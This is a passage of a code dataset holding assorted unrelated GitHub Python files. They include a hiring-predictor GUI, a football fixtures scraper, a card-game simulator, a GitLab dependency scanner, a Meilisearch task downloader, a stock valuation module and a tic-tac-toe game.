https://github.com/abhi7104\nout=Text(frame2,height=3,width=8,padx=10,bd=3)\nout1=Text(frame2,height=3,width=8,bd=3,padx=10)\nout2=Text(frame2,height=3,width=8,bd=3,padx=10)\nout3=Text(frame2,height=3,width=8,bd=3,padx=10)\nout4=Text(frame3,height=3,width=8,bd=3,padx=10)\n\nframe1.grid(row=10,column=3)\nframe2.grid(row=10,column=9)\nframe3.grid(row=11,column=3)\n\nheading.grid(row=0,column=3)\nname.grid(row=2,sticky=E)\npercentage.grid(row=7,sticky=E)\nbacklogs.grid(row=13,sticky=E)\ninternship.grid(row=18,sticky=E)\nfirstround.grid(row=23,sticky=E)\ncommunication.grid(row=28,sticky=E)\n\nnam.grid(row=2,column=5)\nper.grid(row=7,column=5)\nbackl.grid(row=13,column=5)\ninte.grid(row=18,column=5)\nfirs.grid(row=23,column=5)\ncomm.grid(row=28,column=5)\n\nbutton.grid(row=7,column=3,padx=20, pady=10)\nbutton1.grid(row=13,column=3,padx=10, pady=10)\nbutton2.grid(row=18,column=3,padx=10, pady=10)\nbutton3.grid(row=23,column=3,padx=10, pady=10)\n\n\n# algo.grid(row=30,column=0)\n# algo1.grid(row=30,column=4)\n# algo2.grid(row=30,column=8)\n# algo3.grid(row=30,column=12)\n\n\nout.grid(row=7,column=10,padx=10, pady=10)\nout1.grid(row=13,column=10,padx=10, pady=10)\nout2.grid(row=18,column=10,padx=10, pady=10)\nout3.grid(row=23,column=10,padx=10, pady=10)\nout4.grid(row=14,column=10,padx=10, pady=10)\nresult.grid(row=12,column=18)\nwin.mainloop()","repo_name":"abhi7104/Hiring-Predictor","sub_path":"hiring predictor.py","file_name":"hiring predictor.py","file_ext":"py","file_size_in_byte":6931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"34276101550","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\n\n\ndef scores_and_fixtures_df(url: str) -> pd.DataFrame:\n start_url = url\n\n downloaded_html = requests.get(start_url)\n\n soup = BeautifulSoup(downloaded_html.text, features=\"html.parser\")\n\n with open('Premier_League_Score_and_Fixtures_2021-22.html', 'w', encoding='utf-8') as file:\n file.write(soup.prettify())\n\n full_table = soup.select('#sched_11160_1 > tbody')[0]\n # print(full_table)\n table_head = soup.select('#sched_11160_1 > thead')[0]\n # print(table_head)\n\n regex = re.compile('_\\[\\w\\]')\n table_columns = []\n for element in table_head:\n column_label = element.get_text(separator=\" \", strip=True)\n column_label = column_label.replace(' ', '_')\n column_label = regex.sub('', column_label)\n table_columns.append(column_label)\n # print(table_columns)\n table_columns = table_columns[1]\n # print(table_columns)\n table_columns = table_columns.split(\"_\")\n table_columns[12: 14] = [''.join(table_columns[12: 14])]\n # print(table_columns)\n\n table_rows = full_table.select('tr')\n table_data = []\n for index, element in enumerate(table_rows):\n if not element.text.strip():\n continue\n\n row_list = []\n values = element.select('td')\n row_list.append(element.select('th')[0].text.strip())\n for value in values:\n row_list.append(value.text.strip())\n # print(value)\n table_data.append(row_list)\n # print(table_data)\n # table_data.insert(0, table_columns)\n # print(table_data)\n\n df = pd.DataFrame(table_data, columns=table_columns)\n\n pd.set_option(\"display.max_rows\", None, \"display.max_columns\", None)\n\n return df\n","repo_name":"MatthewReddy0/Scraping","sub_path":"scores_and_fixtures.py","file_name":"scores_and_fixtures.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} 
+{"seq_id":"31062495717","text":"from Curve import Curve\nfrom Deck import Deck\nfrom PerfectDeck import PerfectDeck\nfrom RandomDeck import RandomDeck\nfrom Hand import Hand\nfrom Board import Board\nfrom Creature import Creature\nfrom random import randint\n\n\n\ndef Turn(mana, myBoard, enemyBoard, hand, deck):\n\t#print('-----', mana, '-----')\n\t#print(enemyBoard)\n\t#print(myBoard)\n\t#print(hand)\n\t\n\tcard = deck.TakeRandom()\n\t#print(\"Take card \", card)\n\tif card == None:\n\t\tmyBoard.Overdraw()\n\t\tif myBoard.IsDead():\n\t\t\treturn\n\telse:\n\t\thand.Add(card)\n\n\tmyBoard.Attack(enemyBoard)\n\n\tif enemyBoard.IsDead():\n\t\treturn\n\t\n\tcards = hand.Play(mana)\n\t#print (\"Play cards \", cards)\n\n\t#Creatures my not fit into the board, play heaviest first\n\tcards.sort(reverse=True)\n\tfor c in cards:\n\t\tif not myBoard.AddCreature(Creature(c, c)):\n\t\t\thand.Add(c)\n\t\t\t\n\tmyBoard.CalcTotalTempo()\n\n\t#print(\"***Final state***\")\n\t#print(enemyBoard)\n\t#print(myBoard)\n\t#print(hand)\n\ndef Session(deckA, deckB):\n\tfdeck = deckA\n\tsdeck = deckB\n\t\n\tif randint(0, 1):\n\t\tfdeck, sdeck = sdeck, fdeck\n\t\t\n\tfhand = fdeck.GetHand(3)\n\tshand = sdeck.GetHand(4)\n\tshand.AddCoins(1)\n\t\n\tfboard = Board()\n\tsboard = Board()\n\t\n\tmana = 0\n\tfor i in range(50):\n\t\tmana += 1\n\t\tif mana > 10:\n\t\t\tmana = 10\n\t\t\t\n\t\tTurn(mana, fboard, sboard, fhand, fdeck)\n\n\t\tif fboard.IsDead():\n\t\t\treturn sdeck, sboard.totalTempo\n\t\tif sboard.IsDead():\n\t\t\treturn fdeck, fboard.totalTempo\n\n\t\tTurn(mana, sboard, fboard, shand, sdeck)\n\n\t\tif fboard.IsDead():\n\t\t\treturn sdeck, sboard.totalTempo\n\t\tif sboard.IsDead():\n\t\t\treturn fdeck, fboard.totalTempo\n\t\t\t\t\n\treturn None\n\ndef Evaluate(curveA, curveB, runs):\n\ttotalAWins = 0\n\tfor i in range(runs):\n\t\tdeckA = curveA.GetDeck()\n\t\tdeckB = curveB.GetDeck()\n\t\twinner = Session(deckA, deckB)\n\t\ttotalAWins += int(winner == deckA)\n\n\treturn totalAWins/runs\n\ndef Evaluate2(curve, runs):\n\ttotalAWins = 0\n\tfor i in range(runs):\n\t\tdeckA = curve.GetDeck()\n\t\tdeckB = RandomDeck()\n\t\twinner, totalTempo = Session(deckA, deckB)\n\t\ttotalAWins += int(winner == deckA)\n\n\treturn totalAWins/runs\n\n\t\nif __name__ == '__main__':\n\n\tprint(\"Overdraw\")\n\tmyBoard = Board()\n\tmyBoard.health = 1\n\tenemyBoard = Board()\n\tdeck = Deck([])\n\thand = Hand()\t\n\tTurn(10, myBoard, enemyBoard, hand, deck)\n\tassert(myBoard.health == 0)\n\t\n\t\n\tprint(\"Overpopulate board\")\n\tmyBoard = Board([Creature(1, 1), Creature(1, 1), Creature(1, 1), Creature(1, 1), Creature(1, 1), Creature(1, 1)])\n\tenemyBoard = Board()\n\tdeck = Deck([5, 5, 5, 5, 5, 5])\n\thand = Hand()\n\thand.Add(4)\n\tTurn(10, myBoard, enemyBoard, hand, deck)\n\tassert(len(myBoard.creatures) == 7)\n\tassert(len(hand.cards) == 1)\n\tassert(hand.cards[0] == 4)\n\t\n\tprint(\"Evaluate2 test\")\n\n\tprint(Evaluate2(Curve([2, 0, 9, 7, 7, 5, 0]), 10000))\n\tprint(Evaluate2(Curve([2, 3, 7, 7, 6, 4, 1]), 10000))\n\tprint(Evaluate2(Curve([0, 6, 7, 6, 5, 4, 2]), 10000))\n\tprint(Evaluate2(Curve([30, 0, 0, 0, 0, 0, 0]), 10000))\n\tprint(Evaluate2(Curve([0, 0, 0, 0, 0, 0, 0, 30]), 10000))\n\t\n\n\t\n\n\n\n","repo_name":"barsnadcat/hslab","sub_path":"Session.py","file_name":"Session.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"70044800049","text":"# Chapter 9: Try it Yourself. 
9-14: Lottery.\n\nfrom random import randint, choice\nimport string\nimport random\n\n\ni = 0\nj = 0\nlottery_list = []\nlottery_pick = []\n\nwhile i < 10:\n random_no = randint(1, 55)\n lottery_list.append(random_no)\n while i < 5:\n random_ltr = random.choice(string.ascii_uppercase)\n lottery_list.append(random_ltr)\n break\n i += 1\n\nprint(f\"Lottery Machine: {lottery_list}\")\n\nwhile j < 4:\n picked = choice(lottery_list)\n lottery_pick.append(picked)\n j += 1\n\nprint(f\"\\nAny ticket matching with the Lottery Pick: {lottery_pick} wins a prize!\")\n","repo_name":"ceeplusharp/Python_Crash_Course_Examples","sub_path":"pcc_0914_lottery.py","file_name":"pcc_0914_lottery.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"23170613890","text":"from enum import Enum\nfrom field_command import FieldCommand\n\nclass Command(Enum):\n DATA = 0\n ADDRESS_LOWER = 1\n ADDRESS_UPPER = 2\n CACHE = 3\n PROTECTION = 4\n ID = 5\n WRITE = 6\n BURST = 7\n SEND = 8\n GET_READY = 9\n GET_DATA = 10\n GET_WRITE = 11\n GET_VALID = 12\n GET_RESPONSE = 13\n GET_ID = 14\n GET_LAST = 15\n CLEAR = 16\n\nclass Burst(Enum):\n FIXED = 0\n INCR = 1\n WRAP = 2\n\nclass HPStimulator(FieldCommand):\n def write(self, id, address, data):\n value = self._read(Command.GET_READY)\n ready = (0b110 & value) == 0b110\n if not ready:\n raise RuntimeError('not ready to write, maybe there are queued\\\n requests')\n\n self._write(Command.WRITE, 1)\n self._write(Command.ID, id)\n self.setAddress(address)\n self._write(Command.DATA, data >> 8)\n self._write(Command.SEND)\n\n def read(self, id, address):\n value = self._read(Command.GET_READY)\n ready = (0b001 & value) == 0b001\n if not ready:\n raise RuntimeError('not ready to read, maybe there are queued\\\n requests')\n\n self._write(Command.WRITE, 0)\n self._write(Command.ID, id)\n self.setAddress(address)\n self._write(Command.SEND)\n\n def setAddress(self, address):\n self._write(Command.ADDRESS_LOWER, address & 0xffffff)\n self._write(Command.ADDRESS_UPPER, (address >> 24) & 0xff)\n\n def setCache(self, cache):\n self._write(Command.CACHE, cache)\n\n def setBurst(self, burst):\n self._write(Command.BURST, burst.value)\n\n def setProtection(self, protection):\n self._write(Command.PROTECTION, protection)\n\n def response(self):\n if self._read(Command.GET_VALID):\n output = {\n \"id\": self._read(Command.GET_ID),\n \"response\": self.responseField(),\n }\n\n if self._read(Command.GET_WRITE):\n output[\"type\"] = \"write\"\n else:\n output[\"type\"] = \"read\"\n output[\"data\"] = self._read(Command.GET_DATA)\n \n self._write(Command.CLEAR)\n return output\n else:\n return None\n\n def responseField(self):\n value = self._read(Command.GET_RESPONSE)\n\n status = {\n 0: \"normal okay\",\n 1: \"exclusive okay\",\n 2: \"slave error\",\n 3: \"decode error\"\n }\n\n cache = \"must write back\" if value & 0b100 else \"okay\"\n shared = \"maybe shared\" if value & 0b1000 else \"unique\"\n\n return f\"{status[value & 0b11]}, {cache}, {shared}\"\n","repo_name":"huntingt/6111-final-project","sub_path":"drivers/hp_stimulator.py","file_name":"hp_stimulator.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"41256966083","text":"\"\"\"\n This module is to register useful functions.\n\n\"\"\"\nimport time\nfrom flask import request\n\nfrom api import LOGGER, LOGGER_NAME\nimport 
api.global_parameters as api_global\n\n\ndef count_unique_visits(base_url: str = '',\n user: str = '') -> None:\n \"\"\"\n Count the unique visit on the website\n\n :param base_url: url to count the visits\n :param user: id of the user\n\n :return: Nothing\n \"\"\"\n\n if base_url in api_global.UNIQUE_URL_VISITS:\n if user not in api_global.UNIQUE_URL_VISITS[base_url]:\n api_global.UNIQUE_URL_VISITS[base_url].append(user)\n else:\n api_global.UNIQUE_URL_VISITS[base_url] = [user]\n\n return\n\n\ndef record_visit() -> (str, str, str):\n \"\"\"\n Function that register who is visit the path\n\n :return: tuple with basic information\n \"\"\"\n\n meth = request.method\n user = request.remote_addr\n base_url = request.base_url\n\n api_global.CHANNEL.basic_publish(\n exchange='',\n routing_key='api_amqp',\n body='{}-{}-{}'.format(user, base_url, meth))\n\n return base_url, meth, user\n\n\ndef record_message(message: str) -> bool:\n \"\"\"\n Function that register who is visit the path\n\n :return: tuple with basic information\n \"\"\"\n\n state = True\n try:\n api_global.CHANNEL.basic_publish(\n exchange='',\n routing_key='api_amqp',\n body=message)\n except Exception as e:\n print(e)\n state = False\n\n return state\n\n\ndef read_logger_visits() -> list:\n \"\"\"\n Read the logger to show the visit history.\n If the file not exists, the function will return\n\n 'No history visit yet'\n\n :return: a list of visits\n \"\"\"\n try:\n\n with open(r'log/{}.log'.format(LOGGER_NAME), 'r') as f:\n lines = f.readlines()\n\n lines = [line for line in lines if ' VISITS: ' in line]\n\n except FileNotFoundError:\n LOGGER.warning('No history visit yet')\n lines = ['No history visit yet']\n\n return lines\n\n\ndef process_management(conn=None) -> None:\n count_time = 0\n\n api_global.define_connection()\n\n time.sleep(1)\n # set_channel_pika(channel_pika)\n\n record_message('Starting process management')\n\n while api_global.STATUS_MANAGEMENT:\n record_message('Doing stuff on process management. Time {}'.format(count_time))\n time.sleep(5)\n count_time += 1\n\n record_message('Finishing process management')\n api_global.CHANNEL.stop_consuming()\n\n return None\n\n\ndef process_channel(\n num_channel: int) -> None:\n count_time = 0\n\n api_global.define_connection()\n\n time.sleep(1)\n\n record_message('Starting process channel {}'.format(num_channel))\n\n while api_global.STATUS_CHANNEL:\n record_message('Doing stuff on process channel {}. 
'\n 'Time {}'.format(num_channel, count_time))\n time.sleep(1)\n count_time += 1\n\n record_message('Finishing process channel {}'.format(num_channel))\n\n api_global.CHANNEL.stop_consuming()\n\n","repo_name":"AbelGRubio/01-rest-api","sub_path":"api/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"42954974956","text":"\ncalificaciones = dict()\ncalificaciones\n\ncalificaciones['algoritmos'] = 9\ncalificaciones['matematicas'] = 10\ncalificaciones['web'] = 8\ncalificaciones['bases_de_datos'] = 10\ncalificaciones\n\nfor key in calificaciones:\n print(key)\n\nfor value in calificaciones.values():\n print(value)\n\nfor key, value in calificaciones.items():\n print('llave: {}, valor: {}'.format(key, value))\n\n","repo_name":"mijaelrcf/Courses","sub_path":"python-and-django-career/python-course/dictionary_python.py","file_name":"dictionary_python.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"16970726183","text":"import sys, os\n\n\ndef computeAvg(filename):\n f = open(filename, 'r')\n lines = f.readlines()\n sum = 0\n count = 0\n for i in lines:\n sum += float(i)\n count += 1\n print(\"Count: \", count)\n print(\"Sum: \", sum)\n print(\"<===============>\")\n print(\"Avg: \", sum / count)\n return\n\nif __name__ == \"__main__\":\n computeAvg(sys.argv[1])\n \n \n","repo_name":"JHUISI/auto-tools","sub_path":"auto_strong/computeAvg.py","file_name":"computeAvg.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"20"} +{"seq_id":"38345433818","text":"import click\n\n\ndef augmented_task(func):\n func.main = click.command()(func)\n params = func.main.params\n\n for param in params:\n # we only handle option instances (at least for now)\n assert isinstance(param, click.Option)\n\n return func\n","repo_name":"jbeezley/gwdecorators","sub_path":"gwtasks_demo/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"21165105908","text":"import pandas as pd\nimport numpy as np\nfrom collections import Counter\nimport os\nfrom config import Config\nconfig = Config()\n\ndef clean_n(item):\n\n if item == r'\\N':return 0\n else: return item\n\ndef load(type_ = 'train'):\n raw = pd.read_csv(config.data_path+ type_+ r'\\\\'+type_+'.csv', sep=',', header=0, index_col=None)\n\n if config.drop_feature:\n dropped = raw.drop(config.drop_feature, axis=1)\n\n dropped = dropped.applymap(clean_n)\n if type_ == 'train':\n label = dropped[config.label_name].values\n x = dropped.drop(config.label_name, 1).values\n # label_counter = Counter(raw['current_service'].values.tolist())\n\n # print(label_counter.most_common())\n\n # check for \\N values\n # tmp = x[:, 4]\n # for i, each in enumerate(tmp):\n # if isinstance(each, str):\n # print(each)\n # print(i)\n # print( each == r'\\N')\n # print( float(each))\n label = process_label(label)\n return x, label\n else:\n x = dropped.values\n user_id = raw['user_id']\n return x, user_id\n\ndef process_label(y):\n counter = Counter(y.tolist())\n\n keys_by_count = [kv[0] for kv in counter.most_common()]\n\n idx = np.arange(len(keys_by_count))\n\n service_2_index = dict(zip(keys_by_count, idx))\n if not 
os.path.exists(config.out_path+ config.idx_2_service):\n os.mkdir(config.out_path)\n index_2_service = dict(zip(idx, keys_by_count))\n pd.to_pickle(index_2_service, config.out_path+ config.idx_2_service)\n label = np.array([service_2_index[k] for k in y])\n\n return label\n\n\nif __name__ == '__main__':\n load('train')","repo_name":"Stopless-K/china_unicom","sub_path":"data_provider.py","file_name":"data_provider.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"20602411708","text":"# 获取项目列表\n# curl --header \"Authorization: Bearer ${GITLAB_PERSON_AK}\" \"${GITLAB_ORIGIN}/api/v4/projects?pagination=keyset&id_after=0&per_page=100&order_by=id&sort=asc\"\n# 获取文件内容\n# curl --header \"Authorization: Bearer ${GITLAB_PERSON_AK}\" \"${GITLAB_ORIGIN}/tr/sso-api/-/raw/uat/pom.xml\"\n\nimport re\nfrom regex import findLibraryInfo, getDependencyRegex, getParentRegex\nimport requests\n\nimport os\n\nimport numpy\n\nimport aiohttp\nimport asyncio\n\nimport json\n\nfrom prettytable import PrettyTable\n\n\ngitlabPersonAK = os.getenv(\"GITLAB_PERSON_AK\")\ngitlabOrigin = os.getenv(\"GITLAB_ORIGIN\")\n\nid_after = 0\ntable = PrettyTable(['id', 'name', 'project'])\n\nprojectList = []\n\n\nprojectFilePath = \"./git-project.json\"\nif os.path.isfile(projectFilePath):\n fd = open(projectFilePath)\n projectListData = fd.read()\n projectList = json.loads(projectListData)\n fd.close()\nelse:\n while(True):\n response = requests.get(\n gitlabOrigin+\"/api/v4/projects?pagination=keyset&id_after=\"+str(id_after)+\"&per_page=100&order_by=id&sort=asc\", headers={\"Authorization\": \"Bearer \"+gitlabPersonAK})\n list = response.json()\n projectList = projectList+list\n print(\"id_after\", id_after, len(list))\n if len(list) != 100:\n break\n id_after = list[99][\"id\"]\n # for project in list:\n # table.add_row([project[\"id\"], project[\"name\"], project[\"web_url\"]])\n projectListData = json.dumps(projectList)\n fd = open(projectFilePath, \"w+\")\n fd.write(projectListData)\n fd.close()\n # print(table)\n\n\nprint(len(projectList))\n\nprojectData = []\n\n\nasync def fetch(url, sem, project):\n async with sem:\n async with aiohttp.ClientSession() as session:\n async with session.get(url, headers={\"Authorization\": \"Bearer \"+gitlabPersonAK}) as response:\n html = await response.text()\n if response.status != 200:\n return\n projectData.append(\n {\"id\": project[\"id\"], \"name\": project[\"name\"], \"url\": url, \"html\": html})\n\nloop = asyncio.get_event_loop()\nsem = asyncio.Semaphore(100)\n\n\nasync def fetchProject(project, sem):\n await fetch(project[\"web_url\"]+\"/-/raw/uat/pom.xml\", sem, project)\n await fetch(project[\"web_url\"]+\"/-/raw/test/pom.xml\", sem, project)\n await fetch(project[\"web_url\"]+\"/-/raw/master/pom.xml\", sem, project)\n\ntasks = [fetchProject(project, sem)\n for project in projectList]\nloop.run_until_complete(asyncio.wait(tasks))\nloop.close()\n\nfor project in projectData:\n try:\n packageInfo = findLibraryInfo(\n project['html'], 'com.alibaba.cloud', getDependencyRegex)\n if packageInfo == None:\n # print(project[\"id\"], project[\"url\"], 'None')\n continue\n print(project[\"id\"], project[\"url\"], packageInfo[1:3])\n except:\n print(\"发生了异常\", project)\n\n# print(\"====================分界线====================\")\n# for project in projectData:\n# try:\n# packageInfo = findLibraryInfo(\n# project['html'], 'org.springframework.boot', getParentRegex)\n# if packageInfo == 
None:\n# print(project[\"id\"], project[\"url\"], 'None')\n# continue\n# print(project[\"id\"], project[\"url\"], packageInfo[1:3])\n# except:\n# print(\"发生了异常\", project)\n","repo_name":"mzzya/note","sub_path":"scripts/gitlab/gitlab.py","file_name":"gitlab.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7813880019","text":"import copy\nimport uuid\nfrom datetime import datetime\nfrom TIPCommon import dict_to_flat, add_prefix_to_dict\nfrom SiemplifyUtils import convert_datetime_to_unix_time\nfrom constants import DEVICE_VENDOR, DEVICE_PRODUCT, SEVERITY_MAP, DEVICE_RISK_MAP, DEVICE_STATUS_MAP, \\\n DEVICE_RISK_COLOR_MAP\n\n\nclass BaseModel:\n \"\"\"\n Base model for inheritance\n \"\"\"\n def __init__(self, raw_data):\n self.raw_data = raw_data\n\n def to_json(self):\n return self.raw_data\n\n def to_table(self):\n return dict_to_flat(self.to_json())\n\n def to_enrichment_data(self, prefix=None):\n data = dict_to_flat(self.raw_data)\n return add_prefix_to_dict(data, prefix) if prefix else data\n\n\nclass Alert(BaseModel):\n def __init__(self, raw_data, id, threat_factors, details, severity, timestamp):\n super(Alert, self).__init__(raw_data)\n self.id = id\n self.uuid = uuid.uuid4()\n self.threat_factors = threat_factors\n self.details = details\n self.severity = severity\n self.timestamp = convert_datetime_to_unix_time(datetime.strptime(timestamp, '%m/%d/%Y %H:%M:%S'))\n self.events = []\n\n def get_alert_info(self, alert_info, environment_common, device_product_field):\n alert_info.environment = environment_common.get_environment(self.raw_data)\n alert_info.ticket_id = self.id\n alert_info.display_id = str(self.uuid)\n alert_info.name = self.threat_factors\n alert_info.description = self.details\n alert_info.device_vendor = DEVICE_VENDOR\n alert_info.device_product = self.raw_data.get(device_product_field) or DEVICE_PRODUCT\n alert_info.priority = self.get_siemplify_severity()\n alert_info.rule_generator = self.threat_factors\n alert_info.start_time = self.timestamp\n alert_info.end_time = self.timestamp\n alert_info.events = self.to_events()\n\n return alert_info\n\n def get_siemplify_severity(self):\n return SEVERITY_MAP.get(self.severity, -1)\n\n def set_events(self):\n self.events = [self.to_json()]\n\n def to_events(self):\n return [dict_to_flat(event) for event in self.events]\n\n\nclass Device(BaseModel):\n def __init__(self, raw_data, client_version, device_type, email, last_connection, model, name, number, os_type,\n os_version, risk, status):\n super(Device, self).__init__(raw_data)\n self.raw_data = raw_data\n self.client_version = client_version\n self.device_type = device_type\n self.email = email\n self.last_connection = last_connection\n self.model = model\n self.name = name\n self.number = number\n self.os_type = os_type\n self.os_version = os_version\n self.risk = DEVICE_RISK_MAP.get(risk, \"Unknown\")\n self.status = DEVICE_STATUS_MAP.get(status, \"Unknown\")\n\n def to_json(self):\n json_data = copy.deepcopy(self.raw_data)\n json_data[\"risk\"] = self.risk\n json_data[\"status\"] = self.status\n return json_data\n\n def to_enrichment_data(self, prefix=None):\n data = dict_to_flat({\n \"client_version\": self.client_version,\n \"device_type\": self.device_type,\n \"email\": self.email,\n \"last_connection\": self.last_connection,\n \"model\": self.model,\n \"name\": self.name,\n \"number\": self.number,\n \"os_type\": self.os_type,\n \"os_version\": 
self.os_version,\n \"risk\": self.risk,\n \"status\": self.status\n })\n\n data = {key: value for key, value in data.items() if value is not None}\n return add_prefix_to_dict(data, prefix) if prefix else data\n\n def to_table(self):\n return self.to_enrichment_data()\n\n def as_insight(self):\n return f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"\" \\\n f\"
\" \\\n f\"

\" \\\n f\"Risk Level: \" \\\n f\"{self.risk}\" \\\n f\"\" \\\n f\"

\" \\\n f\"
\" \\\n f\"

\" \\\n f\" Status: {self.status}\" \\\n f\"

\" \\\n f\"
\" \\\n f\"

\" \\\n f\"Device: {self.device_type}\" \\\n f\"
OS Type:
{self.os_type}\" \\\n f\"
OS Version:
{self.os_version}\" \\\n f\"
Email:
{self.email}\" \\\n f\"
Model:
{self.model}\" \\\n f\"
Number:
{self.number}\" \\\n f\"

\" \\\n","repo_name":"chronicle/tip-marketplace","sub_path":"Integrations/HarmonyMobile/Managers/datamodels.py","file_name":"datamodels.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"38793762844","text":"import requests\nimport os\n\n# Emit error if data directory isn't empty\nif len(os.listdir('data')) != 0:\n raise Exception('Data directory is not empty')\n\n# Create data directory if it doesn't exist\nif not os.path.exists('data'):\n os.makedirs('data')\n\nbase_url = os.environ.get('MEILISEARCH_URL', 'http://localhost:7700')\ntoken = os.environ.get('MEILISEARCH_MASTER_TOKEN', 'masterKey')\n\nprint(f\"Starting using {base_url} with token {token}\")\nlimit = 10000\ncursor = None\ncount = 0\nwhile True:\n file_name = f'data/tasks_{count}.json'\n start_query = f'&from={cursor}' if cursor else ''\n url = f'{base_url}/tasks?limit={limit}{start_query}'\n print(f\"Downloading tasks from {url} into {file_name}\")\n r = requests.get(url, headers={\n 'Accept': 'application/json', 'Authorization': f'Bearer {token}'})\n payload = r.json()\n\n with open(file_name, 'w') as f:\n f.write(r.text)\n\n print(payload)\n\n if payload[\"next\"] == None:\n print(\"Done\")\n break\n\n cursor = payload[\"next\"]\n count += 1\n","repo_name":"nqn/meili_search_backup","sub_path":"download_tasks.py","file_name":"download_tasks.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"9844507396","text":"#-*- coding: utf-8 -*-\nimport os\nimport pandas as pd\nimport config\nimport pandas\nimport re\nimport math\nfrom modules.valuations.valuation import Valuation\n\n\n# 그레이엄 순수\n# 순유동자산-순유동부채 값의 주가대비 60% 기준\n# 하지만 현대사회 특성을 반영해 주가대비 20% 이상적용\nclass Graham(Valuation):\n def __init__(self, valuation):\n data = valuation.get_data()\n json = valuation.get_json()\n\n Valuation.__init__(self, data, json)\n self.set_json('GRAHAM', self.valuate())\n\n def valuate(self):\n try:\n data = self.get_data()\n json = self.get_json()\n\n bps = json['BPS']\n eps_5_growth = json['EPS_5_GROWTH']\n\n # 당좌자산\n # (유동금융자산+매출채권및기타유동채권+기타유동자산+현금및현금성자산+매각예정비유동자산및처분자산집단)*100000000\n quick_assets = (data['FLOATING_FINANCE_ASSETS'].dropna()[:1][0] +\n data['SALES_AND_FLOATING_BOND'].dropna()[:1][0] +\n data['ETC_FLOATING_ASSETS'].dropna()[:1][0] +\n data['CACHE_ASSETS'].dropna()[:1][0] +\n data['RESERVED_SALE_ASSETS'].dropna()[:1][0]) * 100000000\n\n # 재고자산\n # =재고자산*100000000\n inventory_assets = data['INVENTORY_ASSETS'].dropna()[:1][0] * 100000000\n\n # 매출채권\n # =매출채권및기타유동채권*100000000\n sales_bond = data['SALES_AND_FLOATING_BOND'].dropna()[:1][0] * 100000000\n\n # 유동부채\n # 유동부채*100000000\n floating_debt = data['FLOATING_DEBT'].dropna()[:1][0] * 100000000\n\n # 유통주식 수\n stock_count = data['STOCK_COUNT'].dropna()[:1][0] * 1000\n\n # 현재가\n price = data['PRICE'].dropna()[:1][0]\n\n value = (((quick_assets + inventory_assets + sales_bond) - floating_debt)\n / stock_count) / price\n\n return float(value)\n\n except:\n return None\n","repo_name":"jongha/stock-ai","sub_path":"modules/valuations/graham.py","file_name":"graham.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"22409677626","text":"field_size = 3\nfield = [1,2,3,4,5,6,7,8,9]\nx = 0\na = [1,2,3]\n\ndef draw_field():\n\tprint(f\"{'---▼' * field_size}---\")\n\tfor i in 
range(field_size):\n\t\tprint (f\"►| {field[i * 3]} | {field[1 + i * 3]} | {field[2 + i * 3]} | \")\n\ndef check_winners():\n\n\twin = False\n\n\twin_combo = (\n\t\t(0,1,2), (3,4,5), (6,7,8),\n\t\t(0,3,6), (1,4,7), (2,5,8),\n\t\t(0,4,8), (2,4,6)\n\t)\n\n\tfor pos in win_combo:\n\t\tif (field[pos[0]] == field[pos[1]] and\\\n\t\t\tfield[pos[1]] == field[pos[2]] and\\\n\t\t\tfield[pos[1]] in ('X','O')):\n\t\t\t\twin = field[pos[0]]\n\n\treturn win\n\ndef game_steps(index, char):\n\tif (index > 10 or index < 1 or\\\n\t\tfield[index-1] in ('X','O')):\n\t\t\treturn False\n\n\tfield[index-1] = char\n\treturn True\n\ndef start_game():\n\tcurrent_player = 'X'\n\tstep = 1\n\tdraw_field()\n\twhile (step < 9) and (check_winners() == False):\n\t\tindex = input('Ходит игрок:' + current_player + '. Введите номер поля:\\n')\n\n\t\tif len(index) != 1:\n\t\t\tprint('Введите номер поля')\n\t\t\tcontinue\n\n\t\tif not (index[0].isdigit()):\n\t\t\tprint('Введите число')\n\t\t\tcontinue\n\n\t\tif (game_steps(int(index), current_player)):\n\t\t\tprint('Обновленное поле:')\n\n\t\t\tif (current_player == 'X'):\n\t\t\t\tcurrent_player = 'O'\n\t\t\telse:\n\t\t\t\tcurrent_player = 'X'\n\n\t\t\tdraw_field()\n\t\t\tstep += 1\n\t\telse:\n\t\t\tprint('Поле занято! Повторите!')\n\n\tif (step == 9):\n\t\tprint('Игра оконцена. Ничья!')\n\telse:\n\t\tprint('Выиграл ' + check_winners())\nprint(\"\\n\")\nprint('Право первого хода за игроком (Х)')\nprint('Сделайте первый ход в диапазоне чисел от 1 до 